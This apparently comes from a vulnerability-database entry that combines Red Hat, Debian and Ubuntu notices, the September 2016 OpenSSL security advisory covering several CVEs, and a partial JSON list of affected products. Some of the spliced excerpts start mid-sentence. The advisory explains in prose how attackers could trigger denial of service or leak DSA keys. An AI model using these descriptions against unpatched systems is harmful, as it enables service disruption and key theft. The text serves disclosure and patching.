ppc64: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm openssl-static-1.0.1e-51.el7_2.7.ppc.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm openssl-static-1.0.1e-51.el7_2.7.s390.rpm openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64: openssl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.7.i686.rpm openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.7.i686.rpm openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm openssl-static-1.0.1e-51.el7_2.7.i686.rpm openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-2177 https://access.redhat.com/security/cve/CVE-2016-2178 https://access.redhat.com/security/cve/CVE-2016-2179 https://access.redhat.com/security/cve/CVE-2016-2180 https://access.redhat.com/security/cve/CVE-2016-2181 https://access.redhat.com/security/cve/CVE-2016-2182 https://access.redhat.com/security/cve/CVE-2016-6302 https://access.redhat.com/security/cve/CVE-2016-6304 https://access.redhat.com/security/cve/CVE-2016-6306 https://access.redhat.com/security/updates/classification/#important https://www.openssl.org/news/secadv/20160922.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI xpTW7ApBLmKhVjs49DGYouI= =4VgY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
The References section of this erratum contains a download link (you must log in to download the update). Additional information can be found at https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/
CVE-2016-2178
Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing
leak in the DSA code.
CVE-2016-2179 / CVE-2016-2181
Quan Luo and the OCAP audit team discovered denial of service
vulnerabilities in DTLS.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u4.
For the unstable distribution (sid), these problems will be fixed soon. The JBoss server process must be restarted for the update to take effect. ========================================================================== Ubuntu Security Notice USN-3087-2 September 23, 2016
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was incomplete and caused a regression when parsing certificates. This update fixes the problem.
We apologize for the inconvenience. This issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178) Quan Luo discovered that OpenSSL did not properly restrict the lifetime of queue entries in the DTLS implementation. (CVE-2016-2181) Shi Lei discovered that OpenSSL incorrectly validated division results. (CVE-2016-2182) Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES ciphers were vulnerable to birthday attacks. (CVE-2016-2183) Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303) Shi Lei discovered that OpenSSL incorrectly performed certain message length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make all the necessary changes. If that client continually requests renegotiation, sending a large OCSP Status Request extension each time, then there will be unbounded memory growth on the server. Servers with a default configuration are vulnerable even if they do not support OCSP. Builds using the "no-ocsp" build time option are not affected.
Servers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default configuration, instead only if an application explicitly enables OCSP stapling support.
OpenSSL 1.1.0 users should upgrade to 1.1.0a OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
SSL_peek() hang on empty record (CVE-2016-6305)
Severity: Moderate
OpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an empty record. This could be exploited by a malicious peer in a Denial Of Service attack.
OpenSSL 1.1.0 users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The fix was developed by Matt Caswell of the OpenSSL development team.
SWEET32 Mitigation (CVE-2016-2183)
Severity: Low
SWEET32 (https://sweet32.info) is an attack on older block cipher algorithms that use a block size of 64 bits. In mitigation for the SWEET32 attack DES based ciphersuites have been moved from the HIGH cipherstring group to MEDIUM in OpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these ciphersuites disabled by default.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 16th August 2016 by Karthikeyan Bhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the OpenSSL development team.
OOB write in MDC2_Update() (CVE-2016-6303)
Severity: Low
An overflow can occur in MDC2_Update() either if called directly or through the EVP_DigestUpdate() function using MDC2. If an attacker is able to supply very large amounts of input data after a previous call to EVP_EncryptUpdate() with a partial block then a length check can overflow resulting in a heap corruption.
The amount of data needed is comparable to SIZE_MAX which is impractical on most platforms.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Malformed SHA512 ticket DoS (CVE-2016-6302)
Severity: Low
If a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a DoS attack where a malformed ticket will result in an OOB read which will ultimately crash.
The use of SHA512 in TLS session tickets is comparatively rare as it requires a custom server callback and ticket lookup mechanism.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB write in BN_bn2dec() (CVE-2016-2182)
Severity: Low
The function BN_bn2dec() does not check the return value of BN_div_word(). This can cause an OOB write if an application uses this function with an overly large BIGNUM. This could be a problem if an overly large certificate or CRL is printed out from an untrusted source. TLS is not affected because record limits will reject an oversized certificate before it is parsed.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is the total length the OID text representation would use and not the amount of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner: "p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS message).
The rules of C pointer arithmetic are such that "p + len" is only well defined where len <= SIZE. Therefore the above idiom is actually undefined behaviour.
For example this could cause problems if some malloc implementation provides an address for "p" such that "p + len" actually overflows for values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that a non-constant time codepath is followed for certain operations. This has been demonstrated through a cache-timing attack to be sufficient for an attacker to recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto University), Billy Brumley (Tampere University of Technology), and Yuval Yarom (The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those messages that OpenSSL is not yet ready to process will be buffered for later use. Under certain circumstances, a flaw in the logic means that those messages do not get removed from the buffer even though the handshake has been completed. An attacker could force up to approx. 15 messages to remain in the buffer when they are no longer required. These messages will be cleared when the DTLS connection is closed. The default maximum size for a message is 100k. Therefore the attacker could force an additional 1500k to be consumed per connection. By opening many simulataneous connections an attacker could cause a DoS attack through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that arrive for future epochs update the replay protection "window" before the MAC for the record has been validated. This could be exploited by an attacker by sending a record for the next epoch (which does not have to decrypt or have a valid MAC), with a very large sequence number. This means that all subsequent legitimate packets are dropped causing a denial of service for a specific DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and server certificate. As a result the attack can only be performed against a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0593", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.12.16" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.10.47" }, { "model": "suse linux enterprise module for web scripting", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "12.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.12.0" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.4" }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2i" }, { "model": "linux enterprise module for web scripting", "scope": null, "trust": 0.8, "vendor": "suse", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "ucosminexus service platform", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0 to v8.1" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus http server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux edition )" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "node.js", "scope": null, "trust": 0.8, "vendor": "node js", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.1.0a" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "fujitsu m10-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2280" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.34" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2.0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "fujitsu m10-4 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2271" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.22" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.16" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "communications session border controller scz7.4.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.8" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.29" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.10" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.20" }, 